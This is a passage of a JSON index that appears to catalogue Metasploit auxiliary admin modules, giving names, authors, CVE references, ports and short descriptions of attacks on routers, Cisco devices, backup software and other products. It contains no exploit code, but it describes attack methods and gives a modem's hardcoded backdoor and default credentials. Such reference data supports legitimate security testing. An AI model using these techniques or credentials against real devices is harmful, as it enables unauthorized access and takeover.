
{
"auxiliary_admin/2wire/xslt_password_reset": {
"name": "2Wire Cross-Site Request Forgery Password Reset Vulnerability",
"full_name": "auxiliary/admin/2wire/xslt_password_reset",
"rank": 300,
"disclosure_date": "2007-08-15",
"type": "auxiliary",
"author": [
"hkm <hkm@hakim.ws>",
"Travis Phillips"
],
"description": "This module will reset the admin password on a 2Wire wireless router. This is\n done by using the /xslt page where authentication is not required, thus allowing\n configuration changes (such as resetting the password) as administrators.",
"references": [
"CVE-2007-4387",
"OSVDB-37667",
"BID-36075",
"URL-https://seclists.org/bugtraq/2007/Aug/225"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/2wire/xslt_password_reset.rb",
"is_install_path": true,
"ref_name": "admin/2wire/xslt_password_reset",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/android/google_play_store_uxss_xframe_rce": {
"name": "Android Browser RCE Through Google Play Store XFO",
"full_name": "auxiliary/admin/android/google_play_store_uxss_xframe_rce",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rafay Baloch",
"joev <joev@metasploit.com>"
],
"description": "This module combines two vulnerabilities to achieve remote code\n execution on affected Android devices. First, the module exploits\n CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in\n versions of Android's open source stock browser (the AOSP Browser) prior to\n 4.4. Second, the Google Play store's web interface fails to enforce an\n X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be\n targeted for script injection. As a result, this leads to remote code execution\n through Google Play's remote installation feature, as any application available\n on the Google Play store can be installed and launched on the user's device.\n\n This module requires that the user is logged into Google with a vulnerable browser.\n\n To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041",
"URL-http://1337day.com/exploit/description/22581",
"OSVDB-110664",
"CVE-2014-6041"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb",
"is_install_path": true,
"ref_name": "admin/android/google_play_store_uxss_xframe_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/appletv/appletv_display_image": {
"name": "Apple TV Image Remote Control",
"full_name": "auxiliary/admin/appletv/appletv_display_image",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"0a29406d9794e4f9b30b3c5d6702c708",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will show an image on an AppleTV device for a period of time.\n Some AppleTV devices are actually password-protected, in that case please\n set the PASSWORD datastore option. For password brute forcing, please see\n the module auxiliary/scanner/http/appletv_login.",
"references": [
"URL-http://nto.github.io/AirPlay.html"
],
"platform": "",
"arch": "",
"rport": 7000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/appletv/appletv_display_image.rb",
"is_install_path": true,
"ref_name": "admin/appletv/appletv_display_image",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/appletv/appletv_display_video": {
"name": "Apple TV Video Remote Control",
"full_name": "auxiliary/admin/appletv/appletv_display_video",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"0a29406d9794e4f9b30b3c5d6702c708",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module plays a video on an AppleTV device. Note that\n AppleTV can be somewhat picky about the server that hosts the video.\n Tested servers include default IIS, default Apache, and Ruby's WEBrick.\n For WEBrick, the default MIME list may need to be updated, depending on\n what media file is to be played. Python SimpleHTTPServer is not\n recommended. Also, if you're playing a video, the URL must be an IP\n address. Some AppleTV devices are actually password-protected; in that\n case please set the PASSWORD datastore option. For password\n brute forcing, please see the module auxiliary/scanner/http/appletv_login.",
"references": [
"URL-http://nto.github.io/AirPlay.html"
],
"platform": "",
"arch": "",
"rport": 7000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/appletv/appletv_display_video.rb",
"is_install_path": true,
"ref_name": "admin/appletv/appletv_display_video",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/atg/atg_client": {
"name": "Veeder-Root Automatic Tank Gauge (ATG) Administrative Client",
"full_name": "auxiliary/admin/atg/atg_client",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module acts as a simplistic administrative client for interfacing\n with Veeder-Root Automatic Tank Gauges (ATGs) or other devices speaking\n the TLS-250 and TLS-350 protocols. This has been tested against\n GasPot and Conpot, both honeypots meant to simulate ATGs; it has not\n been tested against anything else, so use at your own risk.",
"references": [
"URL-https://community.rapid7.com/community/infosec/blog/2015/01/22/the-internet-of-gas-station-tank-gauges",
"URL-http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-gaspot-experiment",
"URL-https://github.com/sjhilt/GasPot",
"URL-https://github.com/mushorg/conpot",
"URL-http://www.veeder.com/us/automatic-tank-gauge-atg-consoles",
"URL-http://www.chipkin.com/files/liz/576013-635.pdf",
"URL-http://www.veeder.com/gold/download.cfm?doc_id=6227"
],
"platform": "",
"arch": "",
"rport": 10001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/atg/atg_client.rb",
"is_install_path": true,
"ref_name": "admin/atg/atg_client",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/aws/aws_launch_instances": {
"name": "Launches Hosts in AWS",
"full_name": "auxiliary/admin/aws/aws_launch_instances",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Javier Godinez <godinezj@gmail.com>"
],
"description": "This module will attempt to launch AWS instances (hosts) in EC2. Any instances it\n launches are real, billable resources in the target account and should be terminated once\n they are no longer needed.",
"references": [
"URL-https://drive.google.com/open?id=0B2Ka7F_6TetSNFdfbkI1cnJHUTQ",
"URL-https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/4721/IDY-W10-DevSecOps-on-the-Offense-Automating-Amazon-Web-Services-Account-Takeover.pdf"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/aws/aws_launch_instances.rb",
"is_install_path": true,
"ref_name": "admin/aws/aws_launch_instances",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/backupexec/dump": {
"name": "Veritas Backup Exec Windows Remote File Access",
"full_name": "auxiliary/admin/backupexec/dump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"Unknown"
],
"description": "This module abuses a logic flaw in the Backup Exec Windows Agent to download\n arbitrary files from the system. This flaw was found by someone who wishes to\n remain anonymous and affects all known versions of the Backup Exec Windows Agent. The\n output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program\n listed in the references section. To transfer an entire directory, specify a\n path that includes a trailing backslash.",
"references": [
"CVE-2005-2611",
"OSVDB-18695",
"BID-14551",
"URL-http://www.fpns.net/willy/msbksrc.lzh"
],
"platform": "",
"arch": "",
"rport": 10000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/backupexec/dump.rb",
"is_install_path": true,
"ref_name": "admin/backupexec/dump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/backupexec/registry": {
"name": "Veritas Backup Exec Server Registry Access",
"full_name": "auxiliary/admin/backupexec/registry",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a remote registry access flaw in the BackupExec Windows\n Server RPC service. This vulnerability was discovered by Pedram Amini and is based\n on the NDR stub information posted to openrce.org.\n Please see the action list for the different attack modes.",
"references": [
"OSVDB-17627",
"CVE-2005-0771",
"URL-http://www.idefense.com/application/poi/display?id=269&type=vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 6106,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/backupexec/registry.rb",
"is_install_path": true,
"ref_name": "admin/backupexec/registry",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/chromecast/chromecast_reset": {
"name": "Chromecast Factory Reset DoS",
"full_name": "auxiliary/admin/chromecast/chromecast_reset",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>"
],
"description": "This module performs a factory reset on a Chromecast, causing a denial of service (DoS).\n No user authentication is required.",
"references": [
"URL-http://www.google.com/intl/en/chrome/devices/chromecast/index.html"
],
"platform": "",
"arch": "",
"rport": 8008,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/chromecast/chromecast_reset.rb",
"is_install_path": true,
"ref_name": "admin/chromecast/chromecast_reset",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/chromecast/chromecast_youtube": {
"name": "Chromecast YouTube Remote Control",
"full_name": "auxiliary/admin/chromecast/chromecast_youtube",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>"
],
"description": "This module acts as a simple remote control for Chromecast YouTube.",
"references": [
"URL-http://www.google.com/intl/en/chrome/devices/chromecast/index.html"
],
"platform": "",
"arch": "",
"rport": 8008,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/chromecast/chromecast_youtube.rb",
"is_install_path": true,
"ref_name": "admin/chromecast/chromecast_youtube",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/cisco/cisco_asa_extrabacon": {
"name": "Cisco ASA Authentication Bypass (EXTRABACON)",
"full_name": "auxiliary/admin/cisco/cisco_asa_extrabacon",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Sean Dillon <sean.dillon@risksense.com>",
"Zachary Harding <zachary.harding@risksense.com>",
"Nate Caroe <nate.caroe@risksense.com>",
"Dylan Davis <dylan.davis@risksense.com>",
"William Webb <william_webb@rapid7.com>",
"Jeff Jarmoc <jjarmoc>",
"Equation Group",
"Shadow Brokers"
],
"description": "This module exploits CVE-2016-6366 over SNMP to patch the authentication functions of a Cisco ASA\n to allow uncredentialed logins. Uses improved shellcode for the payload.",
"references": [
"CVE-2016-6366",
"URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp",
"URL-https://github.com/RiskSense-Ops/CVE-2016-6366"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb",
"is_install_path": true,
"ref_name": "admin/cisco/cisco_asa_extrabacon",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/cisco/cisco_secure_acs_bypass": {
"name": "Cisco Secure ACS Unauthorized Password Change",
"full_name": "auxiliary/admin/cisco/cisco_secure_acs_bypass",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jason Kratzer <pyoor@flinkd.org>"
],
"description": "This module exploits an authentication bypass issue which allows arbitrary\n password change requests to be issued for any user in the local store.\n Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well\n as version 5.2 with either no patches or patches 1 and 2 are vulnerable.",
"references": [
"BID-47093",
"CVE-2011-0951",
"URL-http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb",
"is_install_path": true,
"ref_name": "admin/cisco/cisco_secure_acs_bypass",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/cisco/vpn_3000_ftp_bypass": {
"name": "Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access",
"full_name": "auxiliary/admin/cisco/vpn_3000_ftp_bypass",
"rank": 300,
"disclosure_date": "2006-08-23",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module tests for a logic vulnerability in the Cisco VPN Concentrator\n 3000 series. It is possible to execute some FTP statements without authentication\n (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs\n when working with CWD commands. This module simply creates an arbitrary directory,\n verifies that the directory has been created, then deletes it and verifies deletion\n to confirm the bug.",
"references": [
"BID-19680",
"CVE-2006-4313",
"OSVDB-28139",
"OSVDB-28138"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb",
"is_install_path": true,
"ref_name": "admin/cisco/vpn_3000_ftp_bypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/db2/db2rcmd": {
"name": "IBM DB2 db2rcmd.exe Command Execution Vulnerability",
"full_name": "auxiliary/admin/db2/db2rcmd",
"rank": 300,
"disclosure_date": "2004-03-04",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Remote Command Server\n component in IBM's DB2 Universal Database 8.1. An authenticated\n attacker can send arbitrary commands to the DB2REMOTECMD named pipe\n which could lead to administrator privileges.",
"references": [
"CVE-2004-0795",
"OSVDB-4180",
"BID-9821"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/db2/db2rcmd.rb",
"is_install_path": true,
"ref_name": "admin/db2/db2rcmd",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/dns/dyn_dns_update": {
"name": "DNS Server Dynamic Update Record Injection",
"full_name": "auxiliary/admin/dns/dyn_dns_update",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"King Sabri <king.sabri@gmail.com>",
"Brent Cook <brent_cook@rapid7.com>"
],
"description": "This module allows adding and/or deleting a record to\n any remote DNS server that allows unrestricted dynamic updates.",
"references": [
"URL-http://www.tenable.com/plugins/index.php?view=single&id=35372",
"URL-https://github.com/KINGSABRI/CVE-in-Ruby/tree/master/NONE-CVE/DNSInject",
"URL-https://www.christophertruncer.com/dns-modification-dnsinject-nessus-plugin-35372/",
"URL-https://github.com/ChrisTruncer/PenTestScripts/blob/master/DNSInject.py"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/dns/dyn_dns_update.rb",
"is_install_path": true,
"ref_name": "admin/dns/dyn_dns_update",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/edirectory/edirectory_dhost_cookie": {
"name": "Novell eDirectory DHOST Predictable Session Cookie",
"full_name": "auxiliary/admin/edirectory/edirectory_dhost_cookie",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module is able to predict the next session cookie value issued\n by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run\n this module, wait until the real administrator logs in, then specify the\n predicted cookie value to hijack their session.",
"references": [
"CVE-2009-4655",
"OSVDB-60035"
],
"platform": "",
"arch": "",
"rport": 8030,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-07-08 19:00:11 +0000",
"path": "/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb",
"is_install_path": true,
"ref_name": "admin/edirectory/edirectory_dhost_cookie",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/edirectory/edirectory_edirutil": {
"name": "Novell eDirectory eMBox Unauthenticated File Access",
"full_name": "auxiliary/admin/edirectory/edirectory_edirutil",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nicob",
"MC <mc@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will access Novell eDirectory's eMBox service and can run the\n following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,\n STOP_SERVICE, START_SERVICE, SET_LOGFILE.",
"references": [
"CVE-2008-0926",
"BID-28441",
"OSVDB-43690"
],
"platform": "",
"arch": "",
"rport": 8028,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb",
"is_install_path": true,
"ref_name": "admin/edirectory/edirectory_edirutil",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/emc/alphastor_devicemanager_exec": {
"name": "EMC AlphaStor Device Manager Arbitrary Command Execution",
"full_name": "auxiliary/admin/emc/alphastor_devicemanager_exec",
"rank": 300,
"disclosure_date": "2008-05-27",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "EMC AlphaStor Device Manager is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.",
"references": [
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703",
"OSVDB-45715",
"CVE-2008-2157",
"BID-29398"
],
"platform": "",
"arch": "",
"rport": 3000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb",
"is_install_path": true,
"ref_name": "admin/emc/alphastor_devicemanager_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/emc/alphastor_librarymanager_exec": {
"name": "EMC AlphaStor Library Manager Arbitrary Command Execution",
"full_name": "auxiliary/admin/emc/alphastor_librarymanager_exec",
"rank": 300,
"disclosure_date": "2008-05-27",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "EMC AlphaStor Library Manager is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.",
"references": [
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703",
"CVE-2008-2157",
"OSVDB-45715",
"BID-29398"
],
"platform": "",
"arch": "",
"rport": 3500,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb",
"is_install_path": true,
"ref_name": "admin/emc/alphastor_librarymanager_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/firetv/firetv_youtube": {
"name": "Amazon Fire TV YouTube Remote Control",
"full_name": "auxiliary/admin/firetv/firetv_youtube",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>"
],
"description": "This module acts as a simple remote control for the Amazon Fire TV's\n YouTube app.\n\n Tested on the Amazon Fire TV Stick.",
"references": [
"URL-http://www.amazon.com/dp/B00CX5P8FC?_encoding=UTF8&showFS=1",
"URL-http://www.amazon.com/dp/B00GDQ0RMG/ref=fs_ftvs"
],
"platform": "",
"arch": "",
"rport": 8008,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/firetv/firetv_youtube.rb",
"is_install_path": true,
"ref_name": "admin/firetv/firetv_youtube",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/hp/hp_data_protector_cmd": {
"name": "HP Data Protector 6.1 EXEC_CMD Command Execution",
"full_name": "auxiliary/admin/hp/hp_data_protector_cmd",
"rank": 300,
"disclosure_date": "2011-02-07",
"type": "auxiliary",
"author": [
"ch0ks",
"c4an",
"wireghoul",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits HP Data Protector's omniinet process, specifically\n against a Windows setup.\n\n When an EXEC_CMD packet is sent, omniinet.exe will attempt to look\n for that user-supplied filename with kernel32!FindFirstFileW(). If the file\n is found, the process will then go ahead and execute it with CreateProcess()\n under a new thread. If the filename isn't found, FindFirstFileW() will throw\n an error (0x03), and the process bails early without triggering CreateProcess().\n\n Because of these behaviors, if you try to supply an argument, FindFirstFileW()\n will treat it as part of the filename, and then bail.\n\n Please note that when you specify the 'CMD' option, the base path begins\n under C:\\.",
"references": [
"CVE-2011-0923",
"OSVDB-72526",
"ZDI-11-055",
"URL-http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux"
],
"platform": "",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb",
"is_install_path": true,
"ref_name": "admin/hp/hp_data_protector_cmd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/hp/hp_ilo_create_admin_account": {
"name": "HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation",
"full_name": "auxiliary/admin/hp/hp_ilo_create_admin_account",
"rank": 300,
"disclosure_date": "2017-08-24",
"type": "auxiliary",
"author": [
"Fabien Perigaud <fabien.perigaud@synacktiv[dot]com>"
],
"description": "This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer\n overflow in the Connection HTTP header handling by the web server.\n Exploiting this vulnerability gives full access to the REST API, allowing arbitrary\n account creation.",
"references": [
"CVE-2017-12542",
"BID-100467",
"URL-https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us",
"URL-https://www.synacktiv.com/posts/exploit/hp-ilo-talk-at-recon-brx-2018.html"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-03-16 16:46:50 +0000",
"path": "/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb",
"is_install_path": true,
"ref_name": "admin/hp/hp_ilo_create_admin_account",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/hp/hp_imc_som_create_account": {
"name": "HP Intelligent Management SOM Account Creation",
"full_name": "auxiliary/admin/hp/hp_imc_som_create_account",
"rank": 300,
"disclosure_date": "2013-10-08",
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a lack of authentication and access control in HP Intelligent\n Management, specifically in the AccountService RpcServiceServlet from the SOM component,\n in order to create a SOM account with Account Management permissions. This module has\n been tested successfully on HP Intelligent Management Center 5.2 E0401 and 5.1 E202 with\n SOM 5.2 E0401 and SOM 5.1 E0201 over Windows 2003 SP2.",
"references": [
"CVE-2013-4824",
"OSVDB-98249",
"BID-62902",
"ZDI-13-240",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943547"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-10-09 17:06:05 +0000",
"path": "/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb",
"is_install_path": true,
"ref_name": "admin/hp/hp_imc_som_create_account",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/allegro_rompager_auth_bypass": {
"name": "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass",
"full_name": "auxiliary/admin/http/allegro_rompager_auth_bypass",
"rank": 300,
"disclosure_date": "2014-12-17",
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>",
"Jan Trencansky <jan.trencansky@gmail.com>",
"Lior Oppenheim"
],
"description": "This module exploits HTTP servers that appear to be vulnerable to the\n 'Misfortune Cookie' vulnerability which affects Allegro Software\n RomPager versions before 4.34 and can allow attackers to authenticate\n to the HTTP service as an administrator without providing valid\n credentials.",
"references": [
"CVE-2014-9222",
"URL-http://mis.fortunecook.ie",
"URL-http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf",
"URL-http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb",
"is_install_path": true,
"ref_name": "admin/http/allegro_rompager_auth_bypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/arris_motorola_surfboard_backdoor_xss": {
"name": "Arris / Motorola Surfboard SBG6580 Web Interface Takeover",
"full_name": "auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss",
"rank": 300,
"disclosure_date": "2015-04-08",
"type": "auxiliary",
"author": [
"joev <joev@metasploit.com>"
],
"description": "The web interface for the Arris / Motorola Surfboard SBG6580 has\n several vulnerabilities that, when combined, allow an arbitrary website to take\n control of the modem, even if the user is not currently logged in. The attacker\n must know, or guess, the target's internal gateway IP address.\n This is usually a default value of 192.168.0.1.\n\n First, a hardcoded backdoor account was discovered in the source code\n of one device with the credentials \"technician/yZgO8Bvj\". Due to lack of CSRF\n protection in the device's login form, these credentials - along with the default\n \"admin/motorola\" - can be sent to the device by an arbitrary website, thus\n inadvertently logging the user into the router.\n\n Once successfully logged in, a persistent XSS vulnerability is\n exploited in the firewall configuration page. This allows injection of\n Javascript that can perform any available action in the router interface.\n\n The following firmware versions have been tested as vulnerable:\n\n SBG6580-6.5.2.0-GA-06-077-NOSH, and\n SBG6580-8.6.1.0-GA-04-098-NOSH",
"references": [
"CVE-2015-0964",
"CVE-2015-0965",
"CVE-2015-0966",
"URL-https://community.rapid7.com/community/infosec/blog/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb",
"is_install_path": true,
"ref_name": "admin/http/arris_motorola_surfboard_backdoor_xss",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/axigen_file_access": {
"name": "Axigen Arbitrary File Read and Delete",
"full_name": "auxiliary/admin/http/axigen_file_access",
"rank": 300,
"disclosure_date": "2012-10-31",
"type": "auxiliary",
"author": [
"Zhao Liang",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in the WebAdmin\n interface of Axigen, which allows an authenticated user to read and delete\n arbitrary files with SYSTEM privileges. The vulnerability is known to work on\n Windows platforms. This module has been tested successfully on Axigen 8.10 over\n Windows 2003 SP2.",
"references": [
"US-CERT-VU-586556",
"CVE-2012-4940",
"OSVDB-86802"
],
"platform": "",
"arch": "",
"rport": 9000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/axigen_file_access.rb",
"is_install_path": true,
"ref_name": "admin/http/axigen_file_access",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/cfme_manageiq_evm_pass_reset": {
"name": "Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection",
"full_name": "auxiliary/admin/http/cfme_manageiq_evm_pass_reset",
"rank": 300,
"disclosure_date": "2013-11-12",
"type": "auxiliary",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
